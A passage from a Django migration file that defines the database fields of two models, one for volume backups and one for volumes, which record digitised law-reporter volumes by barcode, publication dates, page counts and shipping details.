('reporter_id', models.IntegerField(blank=True, null=True)),
('publicationdategranularity', models.CharField(blank=True, max_length=1, null=True)),
('nom_volume', models.CharField(blank=True, max_length=1024, null=True)),
('nominative_name', models.CharField(blank=True, max_length=1024, null=True)),
('series_volume', models.CharField(blank=True, max_length=1024, null=True)),
('spine_start_date', models.IntegerField(blank=True, null=True)),
('spine_end_date', models.IntegerField(blank=True, null=True)),
('start_date', models.IntegerField(blank=True, null=True)),
                ('end_date', models.IntegerField(blank=True, null=True)),
                ('page_start_date', models.IntegerField(blank=True, null=True)),
                ('page_end_date', models.IntegerField(blank=True, null=True)),
                ('redaction_profile', models.CharField(blank=True, max_length=1, null=True)),
                ('contributing_library', models.CharField(blank=True, max_length=256, null=True)),
                ('rare', models.CharField(blank=True, max_length=255, null=True)),
                ('hscrev', models.CharField(blank=True, max_length=255, null=True)),
                ('hsc_accession', models.DateTimeField(blank=True, null=True)),
                ('needs_repair', models.CharField(blank=True, max_length=255, null=True)),
                ('missing_text_pages', models.CharField(blank=True, max_length=10000, null=True)),
                ('created_by', models.IntegerField()),
                ('bibrev', models.CharField(blank=True, max_length=1, null=True)),
                ('pages', models.IntegerField(blank=True, null=True)),
                ('dup', models.IntegerField(blank=True, null=True)),
                ('created_at', models.DateTimeField()),
                ('updated_at', models.DateTimeField()),
                ('replaced_pages', models.CharField(blank=True, max_length=1024, null=True)),
                ('cases', models.IntegerField(blank=True, null=True)),
                ('marginalia', models.IntegerField(blank=True, null=True)),
                ('pop', models.CharField(blank=True, max_length=1024, null=True)),
                ('title', models.CharField(blank=True, max_length=1024, null=True)),
                ('handfeed', models.IntegerField(blank=True, null=True)),
                ('imgct', models.IntegerField(blank=True, null=True)),
                ('hold', models.IntegerField(blank=True, null=True)),
                ('request_id', models.IntegerField(blank=True, null=True)),
                ('pub_del_pg', models.IntegerField(blank=True, null=True)),
                ('notes', models.CharField(blank=True, max_length=512, null=True)),
                ('pubdel_pages', models.CharField(blank=True, max_length=512, null=True)),
                ('original_barcode', models.CharField(blank=True, max_length=64, null=True)),
                ('scope_reason', models.CharField(blank=True, max_length=16, null=True)),
                ('out_of_scope', models.IntegerField()),
                ('meyer_box_barcode', models.CharField(blank=True, max_length=32, null=True)),
                ('uv_box_barcode', models.CharField(blank=True, max_length=32, null=True)),
                ('meyer_ky_truck', models.CharField(blank=True, max_length=32, null=True)),
                ('meyer_pallet', models.CharField(blank=True, max_length=32, null=True)),
            ],
            options={
                'db_table': 'volume_backups',
            },
        ),
        migrations.CreateModel(
            name='Volumes',
            fields=[
                ('bar_code', models.CharField(max_length=64, primary_key=True, serialize=False, unique=True)),
                ('hollis_no', models.CharField(max_length=128)),
                ('volume', models.CharField(blank=True, max_length=64, null=True)),
                ('publicationdate', models.DateField(blank=True, null=True)),
                ('publisher', models.CharField(blank=True, max_length=255, null=True)),
                ('publicationyear', models.IntegerField(blank=True, null=True)),
                ('reporter_id', models.IntegerField(blank=True, null=True)),
                ('publicationdategranularity', models.CharField(blank=True, max_length=1, null=True)),
                ('nom_volume', models.CharField(blank=True, max_length=1024, null=True)),
                ('nominative_name', models.CharField(blank=True, max_length=1024, null=True)),
                ('series_volume', models.CharField(blank=True, max_length=1024, null=True)),
                ('spine_start_date', models.IntegerField(blank=True, null=True)),
                ('spine_end_date', models.IntegerField(blank=True, null=True)),
                ('start_date', models.IntegerField(blank=True, null=True)),
                ('end_date', models.IntegerField(blank=True, null=True)),
                ('page_start_date', models.IntegerField(blank=True, null=True)),
                ('page_end_date', models.IntegerField(blank=True, null=True)),
                ('redaction_profile', models.CharField(blank=True, max_length=1, null=True)),
                ('contributing_library', models.CharField(blank=True, max_length=256, null=True)),
                ('rare', models.CharField(blank=True, max_length=255, null=True)),
                ('hscrev', models.CharField(blank=True, max_length=255, null=True)),
                ('hsc_accession', models.DateTimeField(blank=True, null=True)),
                ('needs_repair', models.CharField(blank=True, max_length=255, null=True)),
                ('missing_text_pages', models.CharField(blank=True, max_length=10000, null=True)),
                ('created_by', models.IntegerField()),
                ('bibrev', models.CharField(blank=True, max_length=1, null=True)),
                ('pages', models.IntegerField(blank=True, null=True)),
                ('dup', models.IntegerField(blank=True, null=True)),
                ('created_at', models.DateTimeField()),
                ('updated_at', models.DateTimeField()),
                ('replaced_pages', models.CharField(blank=True, max_length=1024, null=True)),
                ('cases', models.IntegerField(blank=True, null=True)),
                ('marginalia', models.IntegerField(blank=True, null=True)),
                ('pop', models.CharField(blank=True, max_length=1024, null=True)),
                ('title', models.CharField(blank=True, max_length=1024, null=True)),
                ('handfeed', models.IntegerField(blank=True, null=True)),
                ('imgct', models.IntegerField(blank=True, null=True)),
                ('hold', models.IntegerField(blank=True, null=True)),
                ('request_id', models.IntegerField(blank=True, null=True)),
                ('pub_del_pg', models.IntegerField(blank=True, null=True)),
                ('notes', models.CharField(blank=True, max_length=512, null=True)),
                ('pubdel_pages', models.CharField(blank=True, max_length=512, null=True)),
                ('original_barcode', models.CharField(blank=True, max_length=64, null=True)),
                ('scope_reason', models.CharField(blank=True, max_length=16, null=True)),
                ('out_of_scope', models.IntegerField()),
                ('meyer_box_barcode', models.CharField(blank=True, max_length=32, null=True)),
                ('uv_box_barcode', models.CharField(blank=True, max_length=32, null=True)),
                ('meyer_ky_truck', models.CharField(blank=True, max_length=32, null=True)),
                ('meyer_pallet', models.CharField(blank=True, max_length=32, null=True)),
            ],
            options={
                'db_table': 'volumes',
            },
        ),
    ]